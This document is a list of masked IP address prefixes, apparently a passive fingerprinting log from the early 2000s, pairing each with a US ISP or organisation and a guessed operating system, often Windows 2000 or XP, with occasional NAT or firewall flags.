24.107.NNN.NNN Charter Comms US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
24.129.NNN.NNN Comcast Cable US Windows XP Pro SP1, 2000 SP3 (NAT!)
24.140.NNN.NNN Massillon Cable US Windows XP, 2000 SP2+
24.154.NNN.NNN Armstrong Cable US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
24.160.NNN.NNN Road Runner US UNKNOWN
24.161.NNN.NNN Road Runner US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
24.162.NNN.NNN Road Runner US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
24.163.NNN.NNN Road Runner US Windows 2000 SP4, XP SP1
24.165.NNN.NNN Road Runner US Windows XP Pro SP1, 2000 SP3
24.166.NNN.NNN Road Runner US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
24.208.NNN.NNN Road Runner US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
24.209.NNN.NNN Road Runner US Windows XP Pro SP1, 2000 SP3 (firewall!)
24.220.NNN.NNN Midcontinent Comms US UNKNOWN
24.231.NNN.NNN Charter Comms US Windows XP SP1, 2000 SP3
24.239.NNN.NNN Armstrong Cable US Windows XP/2000
24.243.NNN.NNN Service Co LLC US Windows XP Pro SP1, 2000 SP3
63.165.NNN.NNN DIGITEL Prob US OpenBSD 3.0
63.192.NNN.NNN Pacific Bell US Windows 2000 SP4, XP SP1
64.12.NNN.NNN AOL US Linux 2.4 w/o timestamps
64.33.NNN.NNN West Winconsin Telecomn US Windows XP, 2000 SP2+
64.58.NNN.NNN Marlowe & Associates US Windows 98 (2) (NAT!)
64.136.NNN.NNN Juno Online US OpenBSD 3.0
64.136.NNN.NNN Juno Online US OpenBSD 3.0
64.136.NNN.NNN Juno Online US OpenBSD 3.0
64.161.NNN.NNN Pacific Bell Internet US Windows XP Pro SP1, 2000 SP3 (NAT!)
64.216.NNN.NNN SBC Internet US Windows XP Pro SP1, 2000 SP3 (NAT!)
64.222.NNN.NNN Verizon Internet US Windows 2000 SP4, XP SP 1
65.78.NNN.NNN RCN Corporation US FreeBSD 4.7
65.166.NNN.NNN Sprint US Windows 98
65.204.NNN.NNN Eagle Mountain Telecom US FreeBSD 4.8
65.221.NNN.NNN Buckeye Cablevision US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
65.229.NNN.NNN UUNET US Windows XP/2000
66.38.NNN.NNN Brandenburg Telephone Company US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
66.41.NNN.NNN Comcast Cable US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
66.45.NNN.NNN WholeSecurity, Inc US Windows 2000 SP4, XP SP1
66.61.NNN.NNN Road Runner US Windows XP Pro SP1, 2000 SP3
66.67.NNN.NNN Road Runnner US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
66.68.NNN.NNN Road Runner US Windows XP Pro SP1, 2000 SP3
66.82.NNN.NNN Hughes Network Systems US UNKNOWN
66.170.NNN.NNN T-NET, Inc US Windows XP, 2000 SP2+
66.188.NNN.NNN Charter Comms US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) (firewall!)
67.5.NNN.NNN Qwest US Windows XP, 2000 SP2+
67.23.NNN.NNN Adelphia Cable Comms US Windows XP Pro SP1, 2000 SP3
67.38.NNN.NNN Ameritech Electronic Commerce US Windows XP, 2000 SP2+
67.66.NNN.NNN SBC Internet Services US Windows XP SP1, 2000 SP3
67.122.NNN.NNN Pac Bell Internet US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
67.160.NNN.NNN Comcast Cable US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
67.164.NNN.NNN Comcast Cable US Windows XP Pro SP1, 2000 SP3 (NAT!)
67.167.NNN.NNN Comcast Cable US UNKNOWN
68.10.NNN.NNN Cox Communications Inc US Windows XP Pro SP1, 2000 SP3
68.14.NNN.NNN Cox Communications Inc US FreeBSD 4.7
68.32.NNN.NNN Comcast Cable US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
68.53.NNN.NNN Comcast Cable US Windows XP Pro SP1, 2000 SP3
68.88.NNN.NNN SBC Internet Services US Windows 2000 SP4, XP SP 1
68.89.NNN.NNN SBC Internet Services US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
68.94.NNN.NNN SBC Internet Services US Windows XP Pro SP1, 2000 SP3 (NAT!)
68.103.NNN.NNN Cox Communications Inc US Windows XP Pro SP1, 2000 SP3
68.109.NNN.NNN Cox Communications Inc US Windows 2000 SP4, XP SP1
68.205.NNN.NNN Road Runner US UNKNOWN
68.254.NNN.NNN SBC Internet Services US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
69.23.NNN.NNN - - Windows XP Pro SP1, 2000 SP3
69.48.NNN.NNN Choice One Comms US Windows XP, 2000 SP2+
69.59.NNN.NNN Peak Inc US Windows XP/2000 via Cisco
69.132.NNN.NNN Road Runner US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
69.133.NNN.NNN Road Runner US Windows XP Pro SP1, 2000 SP3
69.134.NNN.NNN Road Runner US UNKNOWN
69.135.NNN.NNN Road Runner US Windows 2000 SP4, XP SP1
69.135.NNN.NNN Road Runner US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
69.151.NNN.NNN SBC Internet Services US Windows XP Pro SP1, 2000 SP3 (NAT!)
69.162.NNN.NNN Adelphia Cable Comms US FreeBSD 4.7
137.229.NNN.NNN University of Alaska US Windows XP Pro SP1, 2000 SP3
141.154.NNN.NNN Verizon Internet US Windows XP SP1, 2000 SP3
148.78.NNN.NNN Starband Comms US CacheFlow CacheOS 4.1 (up
149.174.NNN.NNN CompuServe US Linux 2.4 w/o timestamps
152.163.NNN.NNN AOL US Linux 2.4 w/o timestamps
156.36.NNN.NNN US Bancorp US OpenBSD 3.0
162.83.NNN.NNN Verizon Internet US Windows 2000 SP4, XP SP1
166.102.NNN.NNN WRK Internet - Windows XP, 2000 SP2+
166.102.NNN.NNN WRK Internet - Windows XP, 2000 SP2+
169.207.NNN.NNN Executive PC, Inc US Windows 98
170.94.NNN.NNN State of Arkansas US Windows 2000 SP4, XP SP1
172.131.NNN.NNN AOL US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
172.131.NNN.NNN AOL US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
204.95.NNN.NNN Sprint US Windows XP, 2000 SP2+
204.210.NNN.NNN Road Runner US Windows 2000 SP4, XP SP1
204.210.NNN.NNN Road Runner US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
205.162.NNN.NNN Buckeye Cablevision US Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222)
206.148.NNN.NNN AGIS US Windows XP, 2000 SP2+
206.196.NNN.NNN US West Internet Services US Windows XP Pro SP1, 2000 SP3
207.89.NNN.NNN NetLink Systems LLC US Windows XP, 2000 SP2+
207.89.NNN.NNN NetLink Systems LLC US Linux 2.4/2.6 (up
207.231.NNN.NNN Surewest Internet US BSD/OS 3.1
208.60.NNN.NNN Local Link US Windows XP, 2000 SP2+
208.187.NNN.NNN Lanset Comms US Windows XP, 2000 SP2+
208.191.NNN.NNN SBC Internet US Windows XP Pro SP1, 2000 SP3 (NAT!)
209.43.NNN.NNN IQuest Internet US Windows XP, 2000 SP2+
209.131.NNN.NNN CenturyTel Internet Holdings Inc US Windows 98
209.206.NNN.NNN IQuest Internet US Windows XP, 2000 SP2+
209.247.NNN.NNN Bend Cable US Linux 2.4/2.6 (up
216.93.NNN.NNN Voyager Information Networks US Windows XP, 2000 SP2+
216.228.NNN.NNN Bend Cable US Cisco Content Engine